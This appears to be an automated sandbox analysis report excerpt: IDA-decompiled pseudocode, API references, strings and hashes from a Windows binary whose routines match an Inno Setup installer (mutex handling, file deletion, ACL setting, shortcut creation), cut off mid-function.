0x00496810
0x00496815
0x0049681d
0x00496824
0x00496825
0x0049682a
0x0049682d
0x00496830
0x0049684a
0x0049684f
0x00496850
0x00496855
0x00496858
0x0049699e
0x00496866
0x0049686e
0x00496873
0x00496876
0x0049687f
0x00496882
0x00496888
0x0049688b
0x0049688f
0x004968a6
0x004968ab
0x004968ae
0x004968b2
0x004968c7
0x004968c7
0x004968b4
0x004968b4
0x004968b8
0x004968c3
0x004968c3
0x004968ba
0x004968ba
0x004968c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004968c1
0x004968b8
0x004968c9
0x004968ce
0x004968cf
0x004968d4
0x004968d7
0x004968e0
0x004968e0
0x004968e2
0x0049690f
0x004968e4
0x004968e4
0x004968e4
0x004968e6
0x00496923
0x00496925
0x004968e8
0x004968e8
0x004968e8
0x004968ea
0x004968fd
0x004968ec
0x004968ec
0x004968ee
0x00496919
0x00496919
0x004968ee
0x004968ea
0x004968e6
0x0049692c
0x0049692f
0x0049692f
0x0049688f
0x00496882
0x00496876
0x004969b0
0x004969b3
0x004969b6
0x004969c3
0x004969c3
0x004967f4

APIs

ShowWindow.USER32(?,00000005,00000000,00496A64,?,?,00000000,?,00000000,00000000,?,00496E1B,00000000,00496E25,?,00000000), ref: 0049674F
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496A64,?,?,00000000,?,00000000,00000000,?,00496E1B,00000000), ref: 00496762
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496A64,?,?,00000000,?,00000000,00000000), ref: 00496772
MsgWaitForMultipleObjects.USER32 ref: 00496793
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496A64,?,?,00000000,?,00000000), ref: 004967A3

Part of subcall function 0042D3F0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D47E,?,?,?,00000001,?,004551E6,00000000,0045524E), ref: 0042D425

Strings

.lst, xrefs: 004967E0
/REG, xrefs: 00496701
.msg, xrefs: 004967C6
%nI, xrefs: 004966F1, 004966FE, 00496715, 00496722, 004967B6, 004967C0, 004967D0, 004967DA
Inno-Setup-RegSvr-Mutex, xrefs: 00496759
/REGU, xrefs: 00496725
\nI, xrefs: 004967DD, 004967EA, 004969E5, 0049683B
Setup, xrefs: 0049673B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: %nI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$\nI
API String ID: 2000705611-3190912533
Opcode ID: ff235013efd8b34a235f546ed23e0fce230df30811661b38410ab99915432809
Instruction ID: 74d9bb5db5280eacafb3ef6f241a34103ccd942b60a8231a3b4c95495beefe54
Opcode Fuzzy Hash: ff235013efd8b34a235f546ed23e0fce230df30811661b38410ab99915432809
Instruction Fuzzy Hash: 2B91B470A046049FDF11EBA5D852BAF7BA4EF49308F528477F800AB692D67C9C05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00459A74 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00459A74(char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a8, intOrPtr _a12) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t61;
				void* _t69;
				void* _t113;
				void* _t137;
				intOrPtr _t164;
				intOrPtr _t176;
				void* _t186;
				signed int _t187;
				char _t189;
				void* _t191;
				void* _t192;
				intOrPtr _t193;

				_t185 = __edi;
				_t138 = __ecx;
				_t191 = _t192;
				_t193 = _t192 + 0xffffffec;
				_push(__edi);
				_v12 = 0;
				_v24 = 0;
				_v5 = __ecx;
				_t137 = __edx;
				_t189 = __eax;
				_push(_t191);
				_push(0x459d30);
				_push( *[fs:eax]);
				 *[fs:eax] = _t193;
				_v6 = 1;
				E0042C8A0(__eax, __ecx,  &_v12, __eflags);
				_t61 = E00406AA4(_v12, 0x459d4c);
				_t195 = _t61;
				if(_t61 != 0) {
					E0042C8A0(_t189, _t138,  &_v12, __eflags);
					__eflags = E00406AA4(_v12, 0x459d7c);
					if(__eflags == 0) {
						E0042C49C(_t189, _t137,  &_v12, 0x459d8c, __edi, _t189, __eflags);
						__eflags = 0;
						E00459A74(_v12, _t137, 0, _t137, __edi, _t189, 0, 0, 0, _a12);
						_pop(_t138);
					}
				} else {
					E0042C49C(_t189, _t137,  &_v12, 0x459d5c, __edi, _t189, _t195);
					E00459A74(_v12, _t137, 0, _t137, __edi, _t189, _t195, 0, 0, _a12);
					E0042C49C(_t189, _t137,  &_v12, 0x459d6c, __edi, _t189, _t195);
					E00459A74(_v12, _t137, 0, _t137, _t185, _t189, _t195, 0, 0, _a12);
					_pop(_t138);
				}
				E0042C8A0(_t189, _t138,  &_v12, _t195);
				_t69 = E00406AA4(_v12, 0x459d9c);
				_t196 = _t69;
				if(_t69 == 0) {
					E00455D64(_t189, _t137, _t185, _t189);
				}
				if(E00452100(_t137, _t189, _t196) == 0) {
					L23:
					_pop(_t164);
					 *[fs:eax] = _t164;
					_push(E00459D37);
					E00403400( &_v24);
					return E00403400( &_v12);
				} else {
					_v20 = _t189;
					_v16 = 0xb;
					_t141 = 0;
					E00456D64("Deleting file: %s", _t137, 0,  &_v20, _t185, _t189);
					_t198 = _a4;
					if(_a4 != 0) {
						_t187 = E00451E40(_t137, _t189, _t198);
						if(_t187 != 0xffffffff) {
							_t200 = _t187 & 0x00000001;
							if((_t187 & 0x00000001) != 0) {
								_t141 = _t187 & 0xfffffffe;
								_t113 = E004521E8(_t137, _t187 & 0xfffffffe, _t189, _t200);
								_t201 = _t113;
								if(_t113 == 0) {
									E00456B58("Failed to strip read-only attribute.", _t137, _t141, _t187, _t189);
								} else {
									E00456B58("Stripped read-only attribute.", _t137, _t141, _t187, _t189);
								}
							}
						}
					}
					if(E00451C68(_t137, _t189, _t201) != 0) {
						__eflags = _v5;
						if(_v5 != 0) {
							SHChangeNotify(4, 1, E00403738(_t189), 0);
							E0042C848(_t189, _t141,  &_v12);
							E004553BC( *((intOrPtr*)(_a12 - 0x14)), _t141, _v12);
						}
						goto L23;
					} else {
						_t186 = GetLastError();
						if(_a8 == 0 ||  *((char*)(_a12 - 1)) == 0) {
							L20:
							_v20 = _t186;
							_v16 = 0;
							E00456D64("Failed to delete the file; it may be in use (%d).", _t137, 0,  &_v20, _t186, _t189);
							_v6 = 0;
							goto L23;
						} else {
							if(_t186 == 5) {
								L18:
								if((E00451E40(_t137, _t189, _t206) & 0x00000001) != 0) {
									goto L20;
								}
								_v20 = _t186;
								_v16 = 0;
								E00456D64("The file appears to be in use (%d). Will delete on restart.", _t137, 0,  &_v20, _t186, _t189);
								_push(_t191);
								_push(0x459c8d);
								_push( *[fs:eax]);
								 *[fs:eax] = _t193;
								E00452F6C(_t137, _t137, _t189, _t186, _t189);
								 *((char*)( *((intOrPtr*)(_a12 - 8)) + 0x1c)) = 1;
								E0042C7A8(_t189,  &_v24);
								E0042C848(_v24, 0,  &_v12);
								E004553BC( *((intOrPtr*)(_a12 + 0xfffffffffffffff0)), _a12, _v12);
								_pop(_t176);
								 *[fs:eax] = _t176;
								goto L23;
							}
							_t206 = _t186 - 0x20;
							if(_t186 != 0x20) {
								goto L20;
							}
							goto L18;
						}
					}
				}
			}

0x00459a74
0x00459a74
0x00459a75
0x00459a77
0x00459a7c
0x00459a7f
0x00459a82
0x00459a85
0x00459a88
0x00459a8a
0x00459a8e
0x00459a8f
0x00459a94
0x00459a97
0x00459a9a
0x00459aa3
0x00459ab0
0x00459ab5
0x00459ab7
0x00459b08
0x00459b1a
0x00459b1c
0x00459b30
0x00459b38
0x00459b3c
0x00459b41
0x00459b41
0x00459ab9
0x00459acb
0x00459ad7
0x00459aef
0x00459afb
0x00459b00
0x00459b00
0x00459b47
0x00459b54
0x00459b59
0x00459b5b
0x00459b5f
0x00459b5f
0x00459b6f
0x00459d12
0x00459d14
0x00459d17
0x00459d1a
0x00459d22
0x00459d2f
0x00459b75
0x00459b75
0x00459b78
0x00459b7f
0x00459b86
0x00459b8b
0x00459b8f
0x00459b9a
0x00459b9f
0x00459ba1
0x00459ba7
0x00459bab
0x00459bb2
0x00459bb7
0x00459bb9
0x00459bcc
0x00459bbb
0x00459bc0
0x00459bc0
0x00459bb9
0x00459ba7
0x00459b9f
0x00459bdc
0x00459ce1
0x00459ce5
0x00459cf5
0x00459cff
0x00459d0d
0x00459d0d
0x00000000
0x00459be2
0x00459be7
0x00459bed
0x00459cc5
0x00459cc5
0x00459cc8
0x00459cd6
0x00459cdb
0x00000000
0x00459c00
0x00459c03
0x00459c0e
0x00459c19
0x00000000
0x00000000
0x00459c1f
0x00459c22
0x00459c30
0x00459c37
0x00459c38
0x00459c3d
0x00459c40
0x00459c49
0x00459c54
0x00459c5d
0x00459c68
0x00459c7b
0x00459c82
0x00459c85
0x00000000
0x00459c85
0x00459c05
0x00459c08
0x00000000
0x00000000
0x00000000
0x00459c08
0x00459bed
0x00459bdc

APIs

GetLastError.KERNEL32(00000000,00459D30,?,?,?,?,?,00000006,?,00000000,00495AFB,?,00000000,00495B9E), ref: 00459BE2

Strings

.chw, xrefs: 00459B29
Failed to delete the file; it may be in use (%d)., xrefs: 00459CD1
The file appears to be in use (%d). Will delete on restart., xrefs: 00459C2B
Failed to strip read-only attribute., xrefs: 00459BC7
.hlp, xrefs: 00459AAB
.fts, xrefs: 00459AE8
Stripped read-only attribute., xrefs: 00459BBB
Deleting file: %s, xrefs: 00459B81
.gid, xrefs: 00459AC4
.lnk, xrefs: 00459B4F
.chm, xrefs: 00459B10

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 1452528299-3112430753
Opcode ID: 76e3eef080dc23c185390f6420406cbe73c46c32cdf80bb7b383ff7407a7baae
Instruction ID: a7ef1fd572b269396f22072ef044e080e7f1ac0323465004d8c0527ddd4a5c49
Opcode Fuzzy Hash: 76e3eef080dc23c185390f6420406cbe73c46c32cdf80bb7b383ff7407a7baae
Instruction Fuzzy Hash: C8717B30B042589BDB11EB6988827AE7BB5AF48715F50846BFC019B383DB7C9E0DC759

Uniqueness

Uniqueness Score: -1.00%

Function 0045BF5C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0045BF5C(intOrPtr __eax, struct _SID_IDENTIFIER_AUTHORITY* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				struct _SID_IDENTIFIER_AUTHORITY* _v12;
				long _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* _v40;
				int _v44;
				void* _v48;
				void* __edi;
				int _t106;
				signed int _t108;
				void* _t114;
				signed int _t116;
				intOrPtr _t128;
				int _t137;
				int _t139;
				int _t140;
				struct HINSTANCE__* _t143;
				struct _SID_IDENTIFIER_AUTHORITY* _t144;
				void* _t146;
				void* _t148;
				intOrPtr _t149;

				_t125 = __edx;
				_t146 = _t148;
				_t149 = _t148 + 0xffffffd4;
				_v12 = __ecx;
				_t114 = __edx;
				_v8 = __eax;
				if( *0x4980dc != 2 || (GetVersion() & 0x000000ff) < 5) {
					_v16 = 1;
					goto L19;
				} else {
					_t143 = GetModuleHandleA("advapi32.dll");
					_t137 = GetProcAddress(_t143, "GetNamedSecurityInfoW");
					_v20 = GetProcAddress(_t143, "SetNamedSecurityInfoW");
					_v24 = GetProcAddress(_t143, "SetEntriesInAclW");
					__eflags = _t137;
					if(_t137 == 0) {
						L6:
						_v16 = 0x7f;
						goto L19;
					} else {
						__eflags = _v20;
						if(_v20 == 0) {
							goto L6;
						} else {
							__eflags = _v24;
							if(_v24 != 0) {
								_v28 = E0045BE64(_t114, _t125);
								 *[fs:edx] = _t149;
								_v44 = 0;
								_v16 =  *_t137(_v28, _v8, 4, 0, 0,  &_v36, 0,  &_v32,  *[fs:edx], 0x45c1ce, _t146);
								__eflags = _v16;
								if(__eflags == 0) {
									_push(_t146);
									_push(0x45c1b1);
									_push( *[fs:edx]);
									 *[fs:edx] = _t149;
									_v44 = E004069BC(_a8 << 5, 0, _t137, __eflags);
									_t144 = _v12;
									_t139 = _a8 - 1;
									__eflags = _t139;
									if(_t139 < 0) {
										L16:
										_v16 = _v24(_a8, _v44, _v36,  &_v40);
										__eflags = _v16;
										if(_v16 == 0) {
											 *[fs:eax] = _t149;
											_v16 = _v20(_v28, _v8, 4, 0, 0, _v40, 0,  *[fs:eax], 0x45c158, _t146);
											__eflags = 0;
											_pop(_t128);
											 *[fs:eax] = _t128;
											_push(0x45c15f);
											return LocalFree(_v40);
										} else {
											E004031BC();
											E004031BC();
											goto L19;
										}
									} else {
										_t140 = _t139 + 1;
										_t116 = 0;
										__eflags = 0;
										while(1) {
											_t106 = AllocateAndInitializeSid(_t144,  *(_t144 + 6),  *(_t144 + 8),  *(_t144 + 0xc), 0, 0, 0, 0, 0, 0,  &_v48);
											__eflags = _t106;
											if(_t106 == 0) {
												break;
											}
											_t108 = _t116 << 2;
											 *((intOrPtr*)(_v44 + _t108 * 8)) =  *((intOrPtr*)(_t144 + 0x10));
											 *((intOrPtr*)(_v44 + 4 + _t108 * 8)) = 1;
											 *((intOrPtr*)(_v44 + 8 + _t108 * 8)) = _a4;
											 *((intOrPtr*)(_v44 + 0x14 + _t108 * 8)) = 0;
											 *((intOrPtr*)(_v44 + 0x18 + _t108 * 8)) = 0;
											 *((intOrPtr*)(_v44 + 0x1c + _t108 * 8)) = _v48;
											_t144 = _t144 + 0x14;
											_t116 = _t116 + 1;
											_t140 = _t140 - 1;
											__eflags = _t140;
											if(_t140 != 0) {
												continue;
											} else {
												goto L16;
											}
											goto L20;
										}
										_v16 = GetLastError();
										__eflags = _v16;
										if(_v16 == 0) {
											_v16 = 0x57;
										}
										E004031BC();
										E004031BC();
										goto L19;
									}
								} else {
									E004031BC();
									L19:
									return _v16;
								}
							} else {
								goto L6;
							}
						}
					}
				}
				L20:
			}

0x0045bf5c
0x0045bf5d
0x0045bf5f
0x0045bf65
0x0045bf68
0x0045bf6a
0x0045bf74
0x0045bf85
0x00000000
0x0045bf91
0x0045bf9b
0x0045bfa8
0x0045bfb5
0x0045bfc3
0x0045bfc6
0x0045bfc8
0x0045bfd6
0x0045bfd6
0x00000000
0x0045bfca
0x0045bfca
0x0045bfce
0x00000000
0x0045bfd0
0x0045bfd0
0x0045bfd4
0x0045bfe9
0x0045bff7
0x0045bffc
0x0045c019
0x0045c01c
0x0045c020
0x0045c02e
0x0045c02f
0x0045c034
0x0045c037
0x0045c045
0x0045c048
0x0045c04e
0x0045c04f
0x0045c051
0x0045c0ee
0x0045c101
0x0045c104
0x0045c108
0x0045c124
0x0045c13e
0x0045c141
0x0045c143
0x0045c146
0x0045c149
0x0045c157
0x0045c10a
0x0045c10a
0x0045c10f
0x00000000
0x0045c10f
0x0045c057
0x0045c057
0x0045c058
0x0045c058
0x0045c05a
0x0045c077
0x0045c07c
0x0045c07e
0x00000000
0x00000000
0x0045c0a6
0x0045c0af
0x0045c0b5
0x0045c0c3
0x0045c0cc
0x0045c0d5
0x0045c0df
0x0045c0e3
0x0045c0e6
0x0045c0e7
0x0045c0e7
0x0045c0e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0045c0e8
0x0045c085
0x0045c088
0x0045c08c
0x0045c08e
0x0045c08e
0x0045c095
0x0045c09a
0x00000000
0x0045c09a
0x0045c022
0x0045c022
0x0045c1d5
0x0045c1de
0x0045c1de
0x00000000
0x00000000
0x00000000
0x0045bfd4
0x0045bfce
0x0045bfc8
0x00000000

APIs

GetVersion.KERNEL32 ref: 0045BF76
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045BF96
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045BFA3
GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045BFB0
GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045BFBE

Part of subcall function 0045BE64: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045BF03,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045BEDD

AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C1B1,?,?,00000000), ref: 0045C077
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C1B1,?,?,00000000), ref: 0045C080

Strings

SetNamedSecurityInfoW, xrefs: 0045BFAA
GetNamedSecurityInfoW, xrefs: 0045BF9D
W, xrefs: 0045C08E
advapi32.dll, xrefs: 0045BF91
SetEntriesInAclW, xrefs: 0045BFB8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
API String ID: 59345061-4263478283
Opcode ID: 5fd7c32ae9c38b6fbf0cd5533e61b4e16f899d5169a0c6f4d54c9881e3902e5f
Instruction ID: fd9bf91de0e054e3a90f1110b6562d13d30b585534f8bc7d41cc9f09cb3f38ce
Opcode Fuzzy Hash: 5fd7c32ae9c38b6fbf0cd5533e61b4e16f899d5169a0c6f4d54c9881e3902e5f
Instruction Fuzzy Hash: 495186B1900704EFDB10DF99C881BEEB7B9EB08715F14806AF915F7282C6789944CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B394 Relevance: 21.1, APIs: 14, Instructions: 126
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0041B394(struct HDC__* __eax, void* __ecx, void* __edx) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t73;
				intOrPtr _t78;
				void* _t85;
				void* _t87;
				void* _t89;
				intOrPtr _t90;

				_t87 = _t89;
				_t90 = _t89 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_push(0);
				L00405BBC();
				_v28 = __eax;
				_push(0);
				L00405BBC();
				_v32 = __eax;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00405F14();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041B37C();
					}
					_push(_t87);
					_push(0x41b443);
					_push( *[fs:eax]);
					 *[fs:eax] = _t90;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00405BB4();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041B37C();
					}
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E0041B44A);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L004060FC();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00405BA4();
					_v20 = _t47;
					if(_v20 != 0) {
						_t73 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t73 != 0) {
							SelectObject(_v28, _t73);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					DeleteDC(_v28);
					DeleteDC(_v32);
					return _v20;
				}
			}

0x0041b395
0x0041b397
0x0041b3a2
0x0041b3a3
0x0041b3a6
0x0041b3a9
0x0041b3ab
0x0041b3b0
0x0041b3b3
0x0041b3b5
0x0041b3ba
0x0041b3c7
0x0041b3ce
0x0041b3e8
0x0041b3ea
0x0041b3ef
0x0041b3f6
0x0041b3f8
0x0041b3f8
0x0041b3ff
0x0041b400
0x0041b405
0x0041b408
0x0041b40e
0x0041b412
0x0041b413
0x0041b416
0x0041b417
0x0041b41c
0x0041b423
0x0041b425
0x0041b425
0x0041b42c
0x0041b42f
0x0041b432
0x0041b437
0x0041b43a
0x0041b43b
0x0041b43d
0x0041b442
0x0041b3d0
0x0041b3d0
0x0041b3d2
0x0041b3d4
0x0041b3d9
0x0041b3da
0x0041b3dd
0x0041b3de
0x0041b3e3
0x0041b44e
0x0041b45d
0x0041b46c
0x0041b493
0x0041b49a
0x0041b4a1
0x0041b4a1
0x0041b4a8
0x0041b4af
0x0041b4af
0x0041b4a8
0x0041b4b8
0x0041b4c1
0x0041b4cf
0x0041b4cf

APIs

740BA590.GDI32(00000000,?,00000000,?), ref: 0041B3AB
740BA590.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3B5
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3C7
740BA410.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3DE
740BAC50.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EA
740BA520.GDI32(00000000,0000000B,?,00000000,0041B443,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B417
740BB380.USER32(00000000,00000000,0041B44A,00000000,0041B443,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43D
SelectObject.GDI32(00000000,?), ref: 0041B458
SelectObject.GDI32(?,00000000), ref: 0041B467
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B493
SelectObject.GDI32(00000000,00000000), ref: 0041B4A1
SelectObject.GDI32(?,00000000), ref: 0041B4AF
DeleteDC.GDI32(00000000), ref: 0041B4B8
DeleteDC.GDI32(?), ref: 0041B4C1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 956127455-0
Opcode ID: 1bf830e07b75d18764d985e51e738aabf01532d498e87c638eb730881828f2e3
Instruction ID: 05b4775bda51026ff0d73d385fe963fbf6f5b4dcd42c920338d43da4f55eec7b
Opcode Fuzzy Hash: 1bf830e07b75d18764d985e51e738aabf01532d498e87c638eb730881828f2e3
Instruction Fuzzy Hash: D441A071E40609AFDF10DAE9D846FEFB7BCEB08704F104466B614FB281D77969408BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00471760 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 333
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00471760(char __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v41;
				char _v42;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _t273;
				signed char _t293;
				intOrPtr _t332;
				intOrPtr _t348;
				intOrPtr _t352;
				intOrPtr _t354;
				void* _t356;
				void* _t357;
				intOrPtr _t358;
				void* _t359;

				_t359 = __eflags;
				_t356 = _t357;
				_t358 = _t357 + 0xffffffc8;
				_v48 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_t354 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t352 = _a32;
				E00403728(_v8);
				_push(_t356);
				_push(0x471b94);
				_push( *[fs:eax]);
				 *[fs:eax] = _t358;
				E00403778(_v8, 8, 1,  &_v48);
				E00403684(_v48, "{group}\\");
				_v13 = _t359 == 0;
				E0047AA00(_v8, 8,  &_v48);
				E00403494( &_v8, _v48);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x471bc0);
				E0042C7A8(_v48,  &_v20);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x471bd0);
				E0042C7A8(_v48,  &_v24);
				E00403494( &_v48, _v8);
				E0040357C( &_v48, 0x471be0);
				E0042C7A8(_v48,  &_v28);
				E0042C7A8(_v8,  &_v32);
				_t293 =  *0x471be8; // 0x8
				if(_a20 == 0) {
					__eflags = _v13;
					if(__eflags != 0) {
						__eflags = _t293;
					}
				} else {
					_t293 = _t293 | 0x00000001;
				}
				if(_a8 != 0) {
					E00477524(6, 1);
					if(6 != 0) {
						_a8 = 0;
					}
				}
				_v41 = E00471430(_t354, 6);
				_t363 = _v41;
				if(_v41 == 0) {
					E00403494( &_v36, _v20);
				} else {
					E00403494( &_v36, _v28);
				}
				_v56 = _v36;
				_v52 = 0xb;
				E00456D64("Filename: %s", _t293, 0,  &_v56, _t352, _t354);
				E0046CDEC(_v36, _t293, 1, _t352, _t354, _t363);
				E0042C848(_v36, 0,  &_v48);
				E0046E738(0, _t293, _t293, _v48, _t352, _t354, _t363,  *((intOrPtr*)(_a44 + 8)));
				E00406F30(_v20);
				E00406F30(_v24);
				if(E0042CCC8(_v28) != 0) {
					WritePrivateProfileStringA(0, 0, 0, E00403738(_v28));
				}
				E00406F30(_v28);
				E00471610(_v32, _t293, _t352, _t354);
				if(_v41 != 0) {
					_t299 = _t352;
					E004714CC(_v28, _t293, _t352, _t354, _t352, _t354, _a28);
					E00403494( &_v40, _v28);
					_v42 = 0;
				} else {
					_t299 = _t354;
					E004556CC(_v20, _t293, _t354, _v12, _t352, _t354,  &_v40, _a4, _a8, _a12, _a24, _a28, _t352, _a36, _a40);
					_t366 = _a8;
					if(_a8 == 0 || E0042CCEC(_t366) == 0) {
						_t273 = 0;
					} else {
						_t273 = 1;
					}
					_v42 = _t273;
					if(_a16 != 0) {
						_t369 = _v42;
						if(_v42 == 0) {
							E0042C8A0(_v40, _t299,  &_v48, _t369);
							if(E00406AA4(_v48, 0x471bd0) == 0) {
								_push(_t356);
								_push( *[fs:eax]);
								 *[fs:eax] = _t358;
								E004546C4(_v40, _t293, 0x471b00 | _a16 == 0x00000001);
								_pop(_t348);
								_t299 = 0x4719d0;
								 *[fs:eax] = _t348;
							}
						}
					}
				}
				 *0x49b3b4 = 1;
				if(_v42 == 0) {
					SHChangeNotify(2, 1, E00403738(_v40), 0);
				} else {
					SHChangeNotify(8, 1, E00403738(_v40), 0);
				}
				E0042C848(_v40, _t299,  &_v48);
				SHChangeNotify(0x1000, 0x1001, E00403738(_v48), 0);
				if(_a20 == 0) {
					if(_v42 == 0) {
						__eflags = _v41;
						if(_v41 == 0) {
							_v60 = _v20;
